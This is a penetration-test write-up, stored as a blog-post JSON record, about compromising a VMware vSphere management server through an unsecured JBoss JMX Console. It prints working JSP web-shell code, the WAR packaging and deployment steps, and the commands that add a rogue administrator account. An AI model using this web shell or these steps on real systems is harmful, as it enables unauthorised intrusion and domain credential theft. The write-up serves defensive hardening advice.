{"id":2819,"date":"2011-10-18T11:20:46","date_gmt":"2011-10-18T10:20:46","guid":{"rendered":"https:\/\/dn-www.azurewebsites.net\/2011\/10\/18\/virtual-security-management\/"},"modified":"2025-07-29T14:57:20","modified_gmt":"2025-07-29T13:57:20","slug":"virtual-security-management","status":"publish","type":"post","link":"https:\/\/dionach.com\/nl\/virtual-security-management\/","title":{"rendered":"Virtual Security Management"},"content":{"rendered":"\t\t<div data-elementor-type=\"wp-post\" data-elementor-id=\"2819\" class=\"elementor elementor-2819\" data-elementor-post-type=\"post\">\n\t\t\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-4f5dac68 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"4f5dac68\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-38ead77b\" data-id=\"38ead77b\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-3b3bc1fe elementor-widget elementor-widget-text-editor\" data-id=\"3b3bc1fe\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>Virtual Security Management &#8211; Virtualisation is amazing for running things simultaneously, on-the-go etc but security problems do come with the positives.&#8221;<\/p>\r\n\r\n<p>First of all, in the interests of fairness, I should point out that I think virtualisation is amazing. I love the idea that my laptop can run several different, largely independent operating systems simultaneously. I love the fact that I can get an entire network and domain infrastructure onto a single physical system, which has a considerably lower power draw than the physical servers would have. And I love the fact that full system backups (snapshots) can take seconds. There are, however, a number of problems, from a security perspective, that go hand in hand with virtualisation, one of which I will discuss here.<\/p>\r\n\r\n<p>I was part of a team of penetration testers that conducted an internal penetration test for a public sector organisation earlier this year. The organisation utilised the well-known virtualisation platform VMware vSphere to host a number of their central systems, including one of their Active Directory domain controllers.<\/p>\r\n\r\n<p>The virtualisation host management network was segregated from the internal network using a carefully constructed series of network VLANs and subnets. In order to perform management activities, a designated dual-homed administration server was configured, with access through the \u201cRemote Desktop\u201d protocol permitted only for members of the local \u201cAdministrators\u201d security group. This group consisted of the built-in \u201cAdministrator\u201d account (which was disabled) and the Active Directory \u201cDomain Admins\u201d security group. This server had all of the necessary tools for administration of the vSphere environment installed and configured, and the local \u201cAdministrators\u201d group was given administrative permissions on the vSphere cluster.<\/p>\r\n\r\n<p>A TCP port scan of the management server identified a web interface was available on port 9090, which turned out to be an unsecured installation of the JBoss JMX Console.<\/p>\r\n\r\n<p>It was possible to upload a specially crafted file (known as a WAR file), and gain an interactive command shell on this server. Some example code is shown below:<\/p>\r\n\r\n<p>1) Create a simple JAVA based interactive shell:<\/p>\r\n\r\n<div class=\"codeblock\" style=\"padding: 5px; border: 1px solid rgb(204, 204, 204); font-family: frutiger-lt-45-light1, Verdana, Geneva, Arial, helvetica, sans-serif; font-size: 14px; line-height: 24px; background-color: rgb(238, 238, 238);\"><code style=\"font-family: 'Courier New', 'DejaVu Sans Mono', monospace, sans-serif; font-size: 1em; line-height: 1.5em;\">%@ page import=\"java.util.*,java.io.*\"%&gt;<br \/>\r\n&lt;HTML&gt;&lt;BODY&gt;&lt;FORM METHOD=\"GET\" NAME=\"myform\" ACTION=\"\"&gt;<br \/>\r\n&lt;INPUT TYPE=\"text\" NAME=\"cmd\"&gt;<br \/>\r\n&lt;INPUT TYPE=\"submit\" VALUE=\"Send\"&gt;<br \/>\r\n&lt;\/FORM&gt;<br \/>\r\n&lt;pre&gt;&lt;%<br \/>\r\nif (request.getParameter(\"cmd\") != null) {<br \/>\r\nout.println(\"Command: \" + request.getParameter(\"cmd\") + \"&lt;BR&gt;\");<br \/>\r\nProcess p = Runtime.getRuntime().exec(request.getParameter(\"cmd\"));<br \/>\r\nOutputStream os = p.getOutputStream();<br \/>\r\nInputStream in = p.getInputStream();<br \/>\r\nDataInputStream dis = new DataInputStream(in);<br \/>\r\nString disr = dis.readLine();<br \/>\r\nwhile ( disr != null ) {<br \/>\r\nout.println(disr);<br \/>\r\ndisr = dis.readLine();}}%&gt;<br \/>\r\n&lt;\/pre&gt;&lt;\/BODY&gt;&lt;\/HTML&gt;<\/code><\/div>\r\n\r\n<p>2) Compile the shell file into a WAR file:<\/p>\r\n\r\n<div class=\"codeblock\" style=\"padding: 5px; border: 1px solid rgb(204, 204, 204); font-family: frutiger-lt-45-light1, Verdana, Geneva, Arial, helvetica, sans-serif; font-size: 14px; line-height: 24px; background-color: rgb(238, 238, 238);\"><code style=\"font-family: 'Courier New', 'DejaVu Sans Mono', monospace, sans-serif; font-size: 1em; line-height: 1.5em;\">jar -cf cmd.war cmd.jsp<\/code><\/div>\r\n\r\n<p>3) Host the WAR file on a local web server.<br \/>\r\n4) Invoke the \u201cAddUrl()\u201d function on the JBoss DeploymentScanner MBean to transfer the WAR file to the server (&#8220;localhost&#8221; is the target):<\/p>\r\n\r\n<div class=\"codeblock\" style=\"padding: 5px; border: 1px solid rgb(204, 204, 204); font-family: frutiger-lt-45-light1, Verdana, Geneva, Arial, helvetica, sans-serif; font-size: 14px; line-height: 24px; background-color: rgb(238, 238, 238);\"><code style=\"font-family: 'Courier New', 'DejaVu Sans Mono', monospace, sans-serif; font-size: 1em; line-height: 1.5em;\"><a href=\"https:\/\/localhost:9090\/jmx-console\/HtmlAdaptor?action=inspectMBean&amp;name=jboss.deployment:type=DeploymentScanner,flavor=URL%3C\/code%3E%3C\/div%3E%3Cp%3E\" style=\"color: rgb(0, 102, 182); text-decoration: none;\">https:\/\/localhost:9090\/jmx-console\/HtmlAdaptor?action=inspectMBean&amp;name=j...<\/a><\/code>\r\n\r\n<p style=\"margin: 0.5em 0px;\"><code style=\"font-family: 'Courier New', 'DejaVu Sans Mono', monospace, sans-serif; font-size: 1em; line-height: 1.5em;\">5) Browse to the uploaded command shell at&nbsp;<a href=\"https:\/\/localhost:9090\/cmd\/cmd.jsp\" style=\"color: rgb(0, 102, 182); text-decoration: none;\">https:\/\/localhost:9090\/cmd\/cmd.jsp<\/a><\/code><\/p>\r\n\r\n<p style=\"margin: 0.5em 0px;\"><code style=\"font-family: 'Courier New', 'DejaVu Sans Mono', monospace, sans-serif; font-size: 1em; line-height: 1.5em;\">Further investigation revealed that this uploaded shell was running in the context of the local \u201cSYSTEM\u201d account:<\/code><\/p>\r\n\r\n<div class=\"codeblock\" style=\"padding: 5px; border: 1px solid rgb(204, 204, 204);\"><code style=\"font-family: 'Courier New', 'DejaVu Sans Mono', monospace, sans-serif; font-size: 1em; line-height: 1.5em;\"><code style=\"font-family: 'Courier New', 'DejaVu Sans Mono', monospace, sans-serif; font-size: 1em; line-height: 1.5em;\"><a href=\"https:\/\/localhost:9090\/cmd\/cmd.jsp?cmd=whoami%3Cbr%20\/%3ENT\" style=\"color: rgb(0, 102, 182); text-decoration: none;\">https:\/\/localhost:9090\/cmd\/cmd.jsp?cmd=whoami<br \/>\r\nNT<\/a>&nbsp;Authority\\SYSTEM<\/code><\/code><\/div>\r\n\r\n<p style=\"margin: 0.5em 0px;\"><code style=\"font-family: 'Courier New', 'DejaVu Sans Mono', monospace, sans-serif; font-size: 1em; line-height: 1.5em;\">This highly privileged account allowed the creation of a new user account in the local \u201cAdministrators\u201d group which immediately inherited complete control over the vSphere cluster:<\/code><\/p>\r\n\r\n<div class=\"codeblock\" style=\"padding: 5px; border: 1px solid rgb(204, 204, 204);\"><code style=\"font-family: 'Courier New', 'DejaVu Sans Mono', monospace, sans-serif; font-size: 1em; line-height: 1.5em;\"><code style=\"font-family: 'Courier New', 'DejaVu Sans Mono', monospace, sans-serif; font-size: 1em; line-height: 1.5em;\"><a href=\"https:\/\/localhost:9090\/cmd\/cmd.jsp?cmd=net+user+dionach+*******+\/add%3Cbr%20\/%3Ehttps:\/\/localhost:9090\/cmd\/cmd.jsp?cmd=net+localgroup+administrators+dionach+\/add%3C\/code%3E%3C\/div%3E%3Cp%3E\" style=\"color: rgb(0, 102, 182); text-decoration: none;\">https:\/\/localhost:9090\/cmd\/cmd.jsp?cmd=net+user+dionach+*******+\/add<br \/>\r\nhttp...<\/a><\/code><\/code>\r\n\r\n<p style=\"margin: 0.5em 0px;\"><code style=\"font-family: 'Courier New', 'DejaVu Sans Mono', monospace, sans-serif; font-size: 1em; line-height: 1.5em;\"><code style=\"font-family: 'Courier New', 'DejaVu Sans Mono', monospace, sans-serif; font-size: 1em; line-height: 1.5em;\">It was then a fairly straightforward task to take a copy of the virtualised domain controller, and then extract the password hashes of the domain accounts and crack them offline.<\/code><\/code><\/p>\r\n\r\n<p style=\"margin: 0.5em 0px;\"><code style=\"font-family: 'Courier New', 'DejaVu Sans Mono', monospace, sans-serif; font-size: 1em; line-height: 1.5em;\"><code style=\"font-family: 'Courier New', 'DejaVu Sans Mono', monospace, sans-serif; font-size: 1em; line-height: 1.5em;\">The lesson to take away from this is that, while virtualisation offers many benefits to an organisation, a great deal of care has to be taken to ensure that management of the virtual environment is performed in as secure a fashion as possible, and doesn\u2019t introduce potential vulnerabilities into the network. A key part of this being to ensure that any designated management systems are fully and appropriately hardened and secured.<\/code><\/code><\/p>\r\n<\/div>\r\n<\/div>\r\n\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<\/div>\n\t\t","protected":false},"excerpt":{"rendered":"<p>Virtual Security Management &#8211; Virtualisation is amazing for running things simultaneously, on-the-go etc but security problems do come with the positives.&#8221; First of all, in the interests of fairness, I should point out that I think virtualisation is amazing. I love the idea that my laptop can run several different, largely independent operating systems simultaneously. [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":18064,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"content-type":"","_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[1],"tags":[209],"class_list":["post-2819","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-researchblog","tag-infrastructure","wpbf-post"],"contentshake_article_id":"","yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.2 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Virtual Security Management<\/title>\n<meta name=\"description\" content=\"Learn how virtual security management (vCISO) helps organisations gain expert cybersecurity leadership without the cost of a full-time hire.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/dionach.com\/nl\/virtual-security-management\/\" \/>\n<meta property=\"og:locale\" content=\"nl_NL\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Virtual Security Management\" \/>\n<meta property=\"og:description\" content=\"Learn how virtual security management (vCISO) helps organisations gain expert cybersecurity leadership without the cost of a full-time hire.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/dionach.com\/nl\/virtual-security-management\/\" \/>\n<meta property=\"og:site_name\" content=\"Dionach\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/dionachcyber\" \/>\n<meta property=\"article:published_time\" content=\"2011-10-18T10:20:46+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-07-29T13:57:20+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/i0.wp.com\/dionach.com\/wp-content\/uploads\/2024\/10\/AdobeStock_804912401.jpeg?fit=2048%2C1148&ssl=1\" \/>\n\t<meta property=\"og:image:width\" content=\"2048\" \/>\n\t<meta property=\"og:image:height\" content=\"1148\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Dionach Admin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@dionachcyber\" \/>\n<meta name=\"twitter:site\" content=\"@dionachcyber\" \/>\n<meta name=\"twitter:label1\" content=\"Geschreven door\" \/>\n\t<meta name=\"twitter:data1\" content=\"Dionach Admin\" \/>\n\t<meta name=\"twitter:label2\" content=\"Geschatte leestijd\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 minuten\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/dionach.com\/nl\/virtual-security-management\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/dionach.com\/nl\/virtual-security-management\/\"},\"author\":{\"name\":\"Dionach Admin\",\"@id\":\"https:\/\/dionach.com\/nl\/#\/schema\/person\/e73f3537233924cf4944f7807068b3c8\"},\"headline\":\"Virtual Security Management\",\"datePublished\":\"2011-10-18T10:20:46+00:00\",\"dateModified\":\"2025-07-29T13:57:20+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/dionach.com\/nl\/virtual-security-management\/\"},\"wordCount\":379,\"publisher\":{\"@id\":\"https:\/\/dionach.com\/nl\/#organization\"},\"image\":{\"@id\":\"https:\/\/dionach.com\/nl\/virtual-security-management\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/i0.wp.com\/dionach.com\/wp-content\/uploads\/2024\/10\/AdobeStock_804912401.jpeg?fit=2048%2C1148&ssl=1\",\"keywords\":[\"infrastructure\"],\"articleSection\":[\"researchblog\"],\"inLanguage\":\"nl-NL\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/dionach.com\/nl\/virtual-security-management\/\",\"url\":\"https:\/\/dionach.com\/nl\/virtual-security-management\/\",\"name\":\"Virtual Security Management\",\"isPartOf\":{\"@id\":\"https:\/\/dionach.com\/nl\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/dionach.com\/nl\/virtual-security-management\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/dionach.com\/nl\/virtual-security-management\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/i0.wp.com\/dionach.com\/wp-content\/uploads\/2024\/10\/AdobeStock_804912401.jpeg?fit=2048%2C1148&ssl=1\",\"datePublished\":\"2011-10-18T10:20:46+00:00\",\"dateModified\":\"2025-07-29T13:57:20+00:00\",\"description\":\"Learn how virtual security management (vCISO) helps organisations gain expert cybersecurity leadership without the cost of a full-time hire.\",\"breadcrumb\":{\"@id\":\"https:\/\/dionach.com\/nl\/virtual-security-management\/#breadcrumb\"},\"inLanguage\":\"nl-NL\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/dionach.com\/nl\/virtual-security-management\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"nl-NL\",\"@id\":\"https:\/\/dionach.com\/nl\/virtual-security-management\/#primaryimage\",\"url\":\"https:\/\/i0.wp.com\/dionach.com\/wp-content\/uploads\/2024\/10\/AdobeStock_804912401.jpeg?fit=2048%2C1148&ssl=1\",\"contentUrl\":\"https:\/\/i0.wp.com\/dionach.com\/wp-content\/uploads\/2024\/10\/AdobeStock_804912401.jpeg?fit=2048%2C1148&ssl=1\",\"width\":2048,\"height\":1148},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/dionach.com\/nl\/virtual-security-management\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/dionach.com\/nl\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Virtual Security Management\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/dionach.com\/nl\/#website\",\"url\":\"https:\/\/dionach.com\/nl\/\",\"name\":\"Dionach\",\"description\":\"Real Security in a Virtual World\",\"publisher\":{\"@id\":\"https:\/\/dionach.com\/nl\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/dionach.com\/nl\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"nl-NL\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/dionach.com\/nl\/#organization\",\"name\":\"Dionach\",\"url\":\"https:\/\/dionach.com\/nl\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"nl-NL\",\"@id\":\"https:\/\/dionach.com\/nl\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/www.dionach.com\/wp-content\/uploads\/2025\/02\/cropped-Dionach-vertical-col-yel-nomios-black-1.jpg\",\"contentUrl\":\"https:\/\/www.dionach.com\/wp-content\/uploads\/2025\/02\/cropped-Dionach-vertical-col-yel-nomios-black-1.jpg\",\"width\":512,\"height\":512,\"caption\":\"Dionach\"},\"image\":{\"@id\":\"https:\/\/dionach.com\/nl\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/dionachcyber\",\"https:\/\/x.com\/dionachcyber\",\"https:\/\/uk.linkedin.com\/company\/dionach-ltd\",\"https:\/\/www.instagram.com\/dionachcyber\/\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/dionach.com\/nl\/#\/schema\/person\/e73f3537233924cf4944f7807068b3c8\",\"name\":\"Dionach Admin\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"nl-NL\",\"@id\":\"https:\/\/secure.gravatar.com\/avatar\/3061726a64a760303f6ea8f0976d3e8e0a6997b4da543be9a650b81584b4e79e?s=96&d=mm&r=g\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/3061726a64a760303f6ea8f0976d3e8e0a6997b4da543be9a650b81584b4e79e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/3061726a64a760303f6ea8f0976d3e8e0a6997b4da543be9a650b81584b4e79e?s=96&d=mm&r=g\",\"caption\":\"Dionach Admin\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Virtual Security Management","description":"Learn how virtual security management (vCISO) helps organisations gain expert cybersecurity leadership without the cost of a full-time hire.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/dionach.com\/nl\/virtual-security-management\/","og_locale":"nl_NL","og_type":"article","og_title":"Virtual Security Management","og_description":"Learn how virtual security management (vCISO) helps organisations gain expert cybersecurity leadership without the cost of a full-time hire.","og_url":"https:\/\/dionach.com\/nl\/virtual-security-management\/","og_site_name":"Dionach","article_publisher":"https:\/\/www.facebook.com\/dionachcyber","article_published_time":"2011-10-18T10:20:46+00:00","article_modified_time":"2025-07-29T13:57:20+00:00","og_image":[{"width":2048,"height":1148,"url":"https:\/\/i0.wp.com\/dionach.com\/wp-content\/uploads\/2024\/10\/AdobeStock_804912401.jpeg?fit=2048%2C1148&ssl=1","type":"image\/jpeg"}],"author":"Dionach Admin","twitter_card":"summary_large_image","twitter_creator":"@dionachcyber","twitter_site":"@dionachcyber","twitter_misc":{"Geschreven door":"Dionach Admin","Geschatte leestijd":"2 minuten"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/dionach.com\/nl\/virtual-security-management\/#article","isPartOf":{"@id":"https:\/\/dionach.com\/nl\/virtual-security-management\/"},"author":{"name":"Dionach Admin","@id":"https:\/\/dionach.com\/nl\/#\/schema\/person\/e73f3537233924cf4944f7807068b3c8"},"headline":"Virtual Security Management","datePublished":"2011-10-18T10:20:46+00:00","dateModified":"2025-07-29T13:57:20+00:00","mainEntityOfPage":{"@id":"https:\/\/dionach.com\/nl\/virtual-security-management\/"},"wordCount":379,"publisher":{"@id":"https:\/\/dionach.com\/nl\/#organization"},"image":{"@id":"https:\/\/dionach.com\/nl\/virtual-security-management\/#primaryimage"},"thumbnailUrl":"https:\/\/i0.wp.com\/dionach.com\/wp-content\/uploads\/2024\/10\/AdobeStock_804912401.jpeg?fit=2048%2C1148&ssl=1","keywords":["infrastructure"],"articleSection":["researchblog"],"inLanguage":"nl-NL"},{"@type":"WebPage","@id":"https:\/\/dionach.com\/nl\/virtual-security-management\/","url":"https:\/\/dionach.com\/nl\/virtual-security-management\/","name":"Virtual Security Management","isPartOf":{"@id":"https:\/\/dionach.com\/nl\/#website"},"primaryImageOfPage":{"@id":"https:\/\/dionach.com\/nl\/virtual-security-management\/#primaryimage"},"image":{"@id":"https:\/\/dionach.com\/nl\/virtual-security-management\/#primaryimage"},"thumbnailUrl":"https:\/\/i0.wp.com\/dionach.com\/wp-content\/uploads\/2024\/10\/AdobeStock_804912401.jpeg?fit=2048%2C1148&ssl=1","datePublished":"2011-10-18T10:20:46+00:00","dateModified":"2025-07-29T13:57:20+00:00","description":"Learn how virtual security management (vCISO) helps organisations gain expert cybersecurity leadership without the cost of a full-time hire.","breadcrumb":{"@id":"https:\/\/dionach.com\/nl\/virtual-security-management\/#breadcrumb"},"inLanguage":"nl-NL","potentialAction":[{"@type":"ReadAction","target":["https:\/\/dionach.com\/nl\/virtual-security-management\/"]}]},{"@type":"ImageObject","inLanguage":"nl-NL","@id":"https:\/\/dionach.com\/nl\/virtual-security-management\/#primaryimage","url":"https:\/\/i0.wp.com\/dionach.com\/wp-content\/uploads\/2024\/10\/AdobeStock_804912401.jpeg?fit=2048%2C1148&ssl=1","contentUrl":"https:\/\/i0.wp.com\/dionach.com\/wp-content\/uploads\/2024\/10\/AdobeStock_804912401.jpeg?fit=2048%2C1148&ssl=1","width":2048,"height":1148},{"@type":"BreadcrumbList","@id":"https:\/\/dionach.com\/nl\/virtual-security-management\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/dionach.com\/nl\/"},{"@type":"ListItem","position":2,"name":"Virtual Security Management"}]},{"@type":"WebSite","@id":"https:\/\/dionach.com\/nl\/#website","url":"https:\/\/dionach.com\/nl\/","name":"Dionach","description":"Real Security in a Virtual World","publisher":{"@id":"https:\/\/dionach.com\/nl\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/dionach.com\/nl\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"nl-NL"},{"@type":"Organization","@id":"https:\/\/dionach.com\/nl\/#organization","name":"Dionach","url":"https:\/\/dionach.com\/nl\/","logo":{"@type":"ImageObject","inLanguage":"nl-NL","@id":"https:\/\/dionach.com\/nl\/#\/schema\/logo\/image\/","url":"https:\/\/www.dionach.com\/wp-content\/uploads\/2025\/02\/cropped-Dionach-vertical-col-yel-nomios-black-1.jpg","contentUrl":"https:\/\/www.dionach.com\/wp-content\/uploads\/2025\/02\/cropped-Dionach-vertical-col-yel-nomios-black-1.jpg","width":512,"height":512,"caption":"Dionach"},"image":{"@id":"https:\/\/dionach.com\/nl\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/dionachcyber","https:\/\/x.com\/dionachcyber","https:\/\/uk.linkedin.com\/company\/dionach-ltd","https:\/\/www.instagram.com\/dionachcyber\/"]},{"@type":"Person","@id":"https:\/\/dionach.com\/nl\/#\/schema\/person\/e73f3537233924cf4944f7807068b3c8","name":"Dionach Admin","image":{"@type":"ImageObject","inLanguage":"nl-NL","@id":"https:\/\/secure.gravatar.com\/avatar\/3061726a64a760303f6ea8f0976d3e8e0a6997b4da543be9a650b81584b4e79e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/3061726a64a760303f6ea8f0976d3e8e0a6997b4da543be9a650b81584b4e79e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/3061726a64a760303f6ea8f0976d3e8e0a6997b4da543be9a650b81584b4e79e?s=96&d=mm&r=g","caption":"Dionach Admin"}}]}},"jetpack_featured_media_url":"https:\/\/i0.wp.com\/dionach.com\/wp-content\/uploads\/2024\/10\/AdobeStock_804912401.jpeg?fit=2048%2C1148&ssl=1","jetpack_sharing_enabled":true,"jetpack_shortlink":"https:\/\/wp.me\/ph4Ojq-Jt","_links":{"self":[{"href":"https:\/\/dionach.com\/nl\/wp-json\/wp\/v2\/posts\/2819","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/dionach.com\/nl\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/dionach.com\/nl\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/dionach.com\/nl\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/dionach.com\/nl\/wp-json\/wp\/v2\/comments?post=2819"}],"version-history":[{"count":0,"href":"https:\/\/dionach.com\/nl\/wp-json\/wp\/v2\/posts\/2819\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/dionach.com\/nl\/wp-json\/wp\/v2\/media\/18064"}],"wp:attachment":[{"href":"https:\/\/dionach.com\/nl\/wp-json\/wp\/v2\/media?parent=2819"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/dionach.com\/nl\/wp-json\/wp\/v2\/categories?post=2819"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/dionach.com\/nl\/wp-json\/wp\/v2\/tags?post=2819"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}